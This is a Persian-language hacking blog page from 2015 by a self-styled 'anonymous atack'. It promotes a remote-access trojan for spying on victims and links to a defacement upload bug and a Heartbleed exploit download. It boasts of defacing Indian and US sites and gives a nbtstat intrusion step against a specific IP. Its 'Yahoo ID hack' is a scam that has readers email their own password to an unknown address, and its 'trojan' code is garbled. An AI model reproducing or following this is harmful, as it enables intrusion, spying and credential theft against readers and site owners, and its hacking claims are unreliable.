پیغام مدیر :
با سلام خدمت شما بازديدكننده گرامي ، خوش آمدید به سایت من . لطفا براي هرچه بهتر شدن مطالب اين وب سایت ، ما را از نظرات و پيشنهادات خود آگاه سازيد و به ما را در بهتر شدن كيفيت مطالب ياري کنید.
اموزش هک کردن سایت با اپلود کردن txt
نوشته شده در سه شنبه 3 آذر 1394
بازدید : 373
نویسنده : anonymous atack

تو سایت های ایرانی یه همچین rat برای اندروید ندیدم , گوشی اندرویدی شما بزرگترن خطر برای لو رفتن اطلاعات شماست لطفا ادامه ی مطلب را بخوانید و آموزش را نگاه کنید تا متوجه شید…

تعریف rat 

رات ها (Rat) ترکیبی از کیلاگرها و Remote Connection هستند که بوسیله آن سیستم قربانی بصورت کامل در اختیار شما قرار خواهد گرفت . 


 برخی امکانات که Rat ها دارند :
 

  • با استفاده از Rat می توان کلیدهای زده شده در کیبورد را به راحتی فهمید ، که با استفاده از آن می توان رمزهای عبور و دیگر موارد مهم هدف (Target) را به دست آورد .
  • با استفاده از Rat می توان به صورت زنده سیستم هدف را مشاهده کرد و با کارهایی مانند بستن پنجره ها و تایپ کردن هدف را کاملاً گیج کرد !!
  • با استفاده از Rat می توان وب کم هدف را مشاهده کرد.
  • با استفاده از Rat میتوان برنامه های هدف را حذف و نصب کرد.
  • با استفاده از Rat می توان هر فایلی که در سیستم هدف می باشد را به راحتی جابه جا کرد ، حتی می توانید فایل های مانند کرم و ویروس را نیز به جان هدف بیاندازید تا پوستش کنده شود.
  • با استفاده از Rat می توان کنترل کامل کامل بر روی هدف داشت … :

 


:: موضوعات مرتبط: اموزش های تصویری , ,



اموزش هک کردن سایت با اپلود کردن txt
نوشته شده در سه شنبه 3 آذر 1394
بازدید : 388
نویسنده : anonymous atack

 

با سلام خدمت دوستان عزیز به تازگی ها یه باگی پیدا شده که توسط اون میتونید فایل txt اپلود کنید که قابل ثبت در zone-h میباشد

 

 

 

 

 

 

 

لینگ دانلود:http://uplod.ir/2ss6...80x1048.rar.htm

 

 

 

 

پسورد:anonymous-sec.org

 

 

 

موفق باشیدخنده

 


:: موضوعات مرتبط: اموزش های تصویری , ,



بازدید : 257
نویسنده : anonymous atack

آموزش طریقه نفوذ با استفاده از خونریزی قلبی اینترنت

یا همان Learning Exploit Heartbleed Internet



دوستان اگه تا آخر فیلم رو نگاه کنین متوجه میشین که چطوری

با استفاده از پورت 443 یه سایت بهش نفوذ میکنه و USER و PASSWORD اون رو پیدا میکنه.

(گفتنی است اوپن*اس*اس*ال (به انگلیسی: OpenSSL) یک پیاده*سازی متن*باز پروتکل اس*اس*ال SSL و تی*ال*اس TLS است. این کتابخانه به زبان برنامه*نویسی سی© نوشته*شده که توابع پایه*ای رمزنگاری و توابع کاربردی مختلفی را پیاده*سازی می*کند. هرچند که این کتابخانه در اصل برای زبان برنامه*نویسی سی ©نوشته شده است، اما تعدادی جلد-کتابخانه برای آن وجود دارد که از طریق آنها می*توان در زبان*های برنامه*نویسی دیگری به غیر از سی هم به رابط*های کتابخانه اپن*اس*اس*ال دسترسی داشت. کتابخانه اپن*اس*اس*ال برای بیشتر سیستم*عامل*های شبه یونیکس نظیر سولاریس، لینوکس، مک اواس ده و گونه*های مختلف بی*اس*دی و همچنین اوپن*وی*ام*اس و مایکروسافت ویندوز هم در دسترس است.)

مالکان سایتهای مختلف با مراجعه به این سایت 
https://lastpass.com/bleed و قرار دادن نام سرور خود می توانند مطمئن شوند که آیا سایت شان در معرض این حفره قرار دارد یا نه؟

سایتی جهت چک کردن خطر امنیتی پروتکل SSL و پورت 443 نفوذ سرور خود و همچنین سایت خود :

https://filippo.io/Heartbleed/

کار اصلی نرم افزار OpenSSL رمز گذاری روی دیتا (وب سایتها، ایمیل ها، سرویس های چت، شبکه های وی پی ان و ساتیهایی که جزییات کارتهای اعتباری را ذخیره می کنند) است که روی دو نوع سرور محبوب در دنیا بنام های آپاچی و nginx اجرا می شود و حالا مشخص شده خودش حفره دارد.

فیلم ها به ترتیب گذاشته خواهند شد


لینک دانلود اکسپلویت نفوذ با استفاده از خونریزی قلبی اینترنتی:

http://s4.picofile.com/file/8173899476/Exploit_Heartbleed_Internet.zip.html 

 


:: موضوعات مرتبط: اموزش های تصویری , ,



نوشته شده در سه شنبه 3 آذر 1394
بازدید : 124
نویسنده : anonymous atack

آموزش طریقه نفوذ با استفاده از خونریزی قلبی اینترنت

یا همان Learning Exploit Heartbleed Internet



دوستان اگه تا آخر فیلم رو نگاه کنین متوجه میشین که چطوری

با استفاده از پورت 443 یه سایت بهش نفوذ میکنه و USER و PASSWORD اون رو پیدا میکنه.

(گفتنی است اوپن*اس*اس*ال (به انگلیسی: OpenSSL) یک پیاده*سازی متن*باز پروتکل اس*اس*ال SSL و تی*ال*اس TLS است. این کتابخانه به زبان برنامه*نویسی سی© نوشته*شده که توابع پایه*ای رمزنگاری و توابع کاربردی مختلفی را پیاده*سازی می*کند. هرچند که این کتابخانه در اصل برای زبان برنامه*نویسی سی ©نوشته شده است، اما تعدادی جلد-کتابخانه برای آن وجود دارد که از طریق آنها می*توان در زبان*های برنامه*نویسی دیگری به غیر از سی هم به رابط*های کتابخانه اپن*اس*اس*ال دسترسی داشت. کتابخانه اپن*اس*اس*ال برای بیشتر سیستم*عامل*های شبه یونیکس نظیر سولاریس، لینوکس، مک اواس ده و گونه*های مختلف بی*اس*دی و همچنین اوپن*وی*ام*اس و مایکروسافت ویندوز هم در دسترس است.)

مالکان سایتهای مختلف با مراجعه به این سایت 
https://lastpass.com/bleed و قرار دادن نام سرور خود می توانند مطمئن شوند که آیا سایت شان در معرض این حفره قرار دارد یا نه؟

سایتی جهت چک کردن خطر امنیتی پروتکل SSL و پورت 443 نفوذ سرور خود و همچنین سایت خود :

https://filippo.io/Heartbleed/

کار اصلی نرم افزار OpenSSL رمز گذاری روی دیتا (وب سایتها، ایمیل ها، سرویس های چت، شبکه های وی پی ان و ساتیهایی که جزییات کارتهای اعتباری را ذخیره می کنند) است که روی دو نوع سرور محبوب در دنیا بنام های آپاچی و nginx اجرا می شود و حالا مشخص شده خودش حفره دارد.

فیلم ها به ترتیب گذاشته خواهند شد


لینک دانلود اکسپلویت نفوذ با استفاده از خونریزی قلبی اینترنتی:

http://s4.picofile.com/file/8173899476/Exploit_Heartbleed_Internet.zip.html 

 


:: موضوعات مرتبط: اموزش های تصویری , ,



هک شدن 71 سایت هندوستان توسط تیم
نوشته شده در سه شنبه 3 آذر 1394
بازدید : 160
نویسنده : anonymous atack

:: موضوعات مرتبط: پروژه های نفوذ , ,



مس دیفیس شدن سرور امریکا
نوشته شده در سه شنبه 3 آذر 1394
بازدید : 193
نویسنده : anonymous atack

:: موضوعات مرتبط: پروژه های نفوذ , ,



با کد های زر امنیت سیستم خود را بالا ببرید
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 183
نویسنده : anonymous atack

ابندا به قسمت Run رفته و سپس دستور CMD را تايپ كنيد و سپس اينتر كنيد

سپس هر يك از اين دستورها را در CMD تايپ كنيد

netsh firewall delete portopening protocol = TCP port = 21 
netsh firewall delete portopening protocol = TCP port = 23 
netsh firewall delete portopening protocol = TCP port = 445 
netsh firewall delete portopening protocol = TCP port = 25 
netsh firewall delete portopening protocol = TCP port = 80 
netsh firewall delete portopening protocol = TCP port = 110 
netsh firewall delete portopening protocol = TCP port = 1723 
netsh firewall delete portopening protocol = TCP port = 3389 
netsh firewall delete portopening protocol = TCP port = 3306 
netsh firewall delete portopening protocol = TCP port = 110 
netsh firewall delete portopening protocol = TCP port = 1433 
netsh firewall delete portopening protocol = TCP port = 5900 
netsh firewall delete portopening protocol = TCP port = 8080
شما براي بستن پورت هاي خطرناك فقط عدد اخر هر سطر را تغيير دهيد!

ادامه پورت هاي خطرناك در ادامه مطلب




ساخت ویروس های ترو جان
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 213
نویسنده : anonymous atack

Form1 = 44, 54, 704, 644, , 22, 27, 591, 467, C
Module1 = 66, 81, 635, 521, Z




اموزش هک ایدی یاهو
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 206
نویسنده : anonymous atack

با سلام این آموزش هک ایدی میباشد.

وارد ایمیل خود شوید و به قسمت ایمیل جدید بروید.
در قسمت to این ایمیل که میدم رو میزنید.
robot_forgot3@yahoo.com
در قسمت subject ایدی که میخواهید هک کنید رو میزنید فقط ایدی بدون @yahoo.com .
بعدش توی قسمتی که پیام رو میزنی این چیزی که من میدم رو وارد میکنی و توی بعضی از قسمتاش تغییر میدی.

DNS YAHOO $$()()()()()()()_()()(%%%%%%%%%%%%%23H
(اینجا ایدی خود)$#@#############(اینجا هم پس خود را)#########

((###%$%%%%%%%676480000_=34HJ MOP^^^^^^
SEN IMALE %%%%%%%23 yahoo port 23 ()111111 kop.exe
Ddos id sed me subject yahoo ################%100.49.49.100
!@#$%^&*()_+_)((*&*^&%$$##@!+_)(*(*&&^^%$#@@!)send send
!@   pass_robot _server_isp%%%%%%%%%4455456489890230 send yahoo dns
compleate send email %100
در ان قسمتی که قرمز کردم ایدی خود و رمز ایمیل خود رو میزنید.چون وقتی اون ایدی که میخواهید هک بشه به رمز شما تغییر پیدا میکنه ایدی هک شده.

با تشکر    anonymous atackچشمک




کدهای هک
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 248
نویسنده : anonymous atack

بقیه کد ها در ادامه مطالب




حمله ادم پذیش سرویس dos
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 177
نویسنده : anonymous atack

حمله DoS تلاشی است برای جلوگیری از دسترسی کاربران به سرویس یا سرور و در نهایت تعطیل کردن سرویس. این هدف با پر کردن صف درخواست های سرور با درخواست های تقلبی انجام می شه. در صورتیکه این حمله به وسیله تعداد زیادی کامپیوتر انجام بشه به اون “حمله عدم پذیرش سرویس توزیع شده” یا DDoS می گن. 

عموما دو گونه حمله DoS داریم، یکی که به از کار افتادن سرور منتج می شه و دیگری که سرویس رو مشغول می کنه. 
حمله عدم پذیرش سرویس توزیع شده DDoS 

همونطور که گفته شد در صورتیکه کامپیوترهای زیادی در حمله DoS همزمان به یک هدف شرکت داشته باشن، اون حمله رو DDoS می گیم، حمله ای پیچیده تر و قدرتمند. سناریوی انجام همچین حمله ای به این شکله که حمله کننده ابتدا تعداد زیادی کامپیوتر رو آلوده می کنه و با نصب و اجرای ابزار حمله DoS از طریق اون کامپیتورها، حمله اصلی رو انجام می ده. کامپیوترهای آلوده شده که شبکه زامبی رو تکشیل می دن معمولا به هزاران کامپیوتر و حتی صدها هزار می رسند. این شیوه باعث می شه که قربانی نتونه با بلاک کردن IP به راحتی جلوی حمله رو بگیره. هکرها معمولا با پخش کردن تروجان این شبکه زامبی رو به دست میارن. هرچه شبکه زامبی بزرگتر باشه، حمله موفق تر خواهد بود. 

 




راه های مقابله با هکر های اینترنتی
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 112
نویسنده : anonymous atack

راه های مقابله با هکرهای اینترنتی یکی از راهایی است برای جلوگیری از نفوذ هکر ها.هر کاربر که به طور مستقیم با اینترنت سر و کار دارد باید این دانستنیها رو بداند تا از هک شدن و آسیب دیدن درامان باشد.این مطلب برای کسانی که چیزی از هک و هک شدن نمیدونن خیلی میتواند مفید باشد.توصیه میکنم حتما بخونیدش. 

*** 
شبکه اینترنت به سرچشمه اطلاعات، بازارى شلوغ، عرصه اجتماعى پر جنب و جوش و کمینگاه مناسبى براى تبهکاران سایبر تبدیل شده است. 
روزنامه نیویورک تایمز در گزارشی از قول کارشناسان مى‌نویسد که تبهکاران از فرصت هاى مختلف در شبکه اینترنتى براى سوء استفاده و حمله به کاربران معمولى استفاده مى‌ کنند و جلوگیرى از آن بسیار دشوار است. 
یکى از روش هاى معمول فرستادن ویروس و برنامه هاى پنهانى به وب سایت هاى مشروع و پر مراجعه است. سپس این برنامه اطلاعات شخصى مراجعان به این وب سایت ها را جمع آورى کرده که مى‌تواند بعدا براى کلاهبرداری هاى گوناگون مورد استفاده قرار بگیرد. 
کارشناسان مى‌ گویند که در گذشته تشخیص ویروس ها آسان تر بود ولى اکنون این کار توسط نرم افزارهایى صورت مى‌گیرد که بى سر و صدا و غیر قابل تشخیص هستند. شبکه اینترنت در چند سال اخیر فرصت هاى بیشترى براى تبهکاران و سارقان اطلاعات شخصى مردم فراهم کرده است. 
نیویورک تایمز مى‌افزاید: سیستم کنترل اتوماتیک شرکت گوگل در دوره اخیر حدود ۳۰۰ هزار مورد از نرم افزارهاى سارق اطلاعات را در وب سایت هاى گوناگون شناسایى و از کار انداخته است. 
این موارد به گفته گوگل به نسبت دو سال پیش دو برابر شده است. یک سازنده نرم افزارهاى امنیتى نیز مى‌گوید که تعداد کشف نرم افزارهاى سارق در سال گذشته دو برابر شده و به رقم ۲۴۰ هزار مورد رسیده است. 
علاوه بر این انواع و اقسام نرم افزارهاى ضد ویروس تقلبى و شیوه هاى دیگر جلب و حیله کاربران اینترنت نیز وجود دارد. بنابر این حفاظت از اطلاعات شخصى بیش از گذشته اهمیت مى‌یابد.
چند راهکار اساسى براى مقابله با سارقان اطلاعات و تبهکاران اینترنتى عبارتند از :

 

از مرورگر خود حفاظت کنید:

 

 




عنواع هک نفوذ پزیری اطلاعات
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 191
نویسنده : anonymous atack

 

با سلام و خسته نباشید به همه ی عزیزان گلمون

 

میخواستم امروز در بحث نفوذ پذیریی اطلاعاتی به شما عزیزان گل بدم و امیدوارم کمکی کرده باشم

 

خب بریم سر اصل مطلب

1:fake page

خوب حتما با خودتون میپرسیدکه هک فیک پیج چی هست ما به شما جواب سوالتون رو خواهیم داد....

هک فیک پیج یه صفحات تقلبی از برخی صفحه ورود سایت ها هستند که قربانی رو وادار میکنند که نام کاربری و رمز خود را وارد کنید که نام کاربری و پسورد دست شخصی که شمارو وادار کرده بنام هکر میباشد.....

 

2:keylogger

 




اموزش جلوگیری از هک شدن موبایل
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 146
نویسنده : anonymous atack

امروزه با فراگیر شدن گوشی های هوشمند، اغلب افراد صاحب یکی این گوشی ها هستند و روزانه ده ها برنامه را در آنها اجرا می کنند. اگر موبایل شما دارای سیستم عامل اندروید، iOS، سیمبین، یا ویندوز موبایل است، پس شما هم صاحب یک گوشی هوشمند هستید.
موبایل شما به طور ناخواسته ممکن است دچار حمله‌های هکری قرار بگیرد و اطلاعات شخصی خود را از دست بدهید. ما سعی کردیم تا در این مطلب به کاربران کمک کنیم تا با رعایت برخی مسائل امنیتی، از هک شدن موبایل خود جلوگیری کنند.
پس نکات زیر را با دقت مطالعه کنید:
1- هر وقت میخواهید وارد سرویس ایمیل یا سایت بانکی خود شوید، آدرس را با پیشوند HTTPS وارد کنید (مثلا https://gmail.com).به این ترتیب به شیوه ای امن به سایت مورد نظر وصل میشوید و امکان سرقت اطلاعات بسیار کم خواهد شد. تقریبا تمام سایت های بانکی و سرویس های ایمیل از پروتکل امن SSL پشتیبانی میکنند. 

2- اگر ایمیل ناشناس (و مخصوصا ایمیل حاوی لینک) دریافت کردید، روی لینکهای موجود در ایمیل کلیک نکنید. زیرا هکرها با ارسال یک لینک حاوی کد مخرب میتوانند موبایل یا تبلت شما را تحت کنترل در بیاورند. البته ایمیلهایی که از سایتهای معتبر دریافت می‌کنید همیشه امن هستند. (مخصوص سایت هایی که خودتان در آنها ثبت نام کرده اید)





نفوذ به سیتم دیگران
نوشته شده در دو شنبه 2 آذر 1394
بازدید : 153
نویسنده : anonymous atack

اين روش مخصوص پورت 139 هستش که بهتره ابتدا با برنامه هاي پورت اسکنر ببينيد پورت 139 بازه يا و اگه بسته بود خودتون بازش کنيد

 

" طريقه باز کردن پورتهاي بسته رو هم تو فرصت مناسب آموزش ميدم "

آموزش رو با فرض اينکه آي پي 32.172.69.98 مورد نظر است شروع ميکنم.

براي شروع وارد run شده و دستور cmd را وارد کنيد و اينتر بزنيد

بعد از اينکه صفحه cmd باز شد فرمان زير را در آن تايپ کنيد:

کد:
nbtstat -a 32.172.69.98
اگر پورت باز باشه اين پيام رو نشون ميده


کد: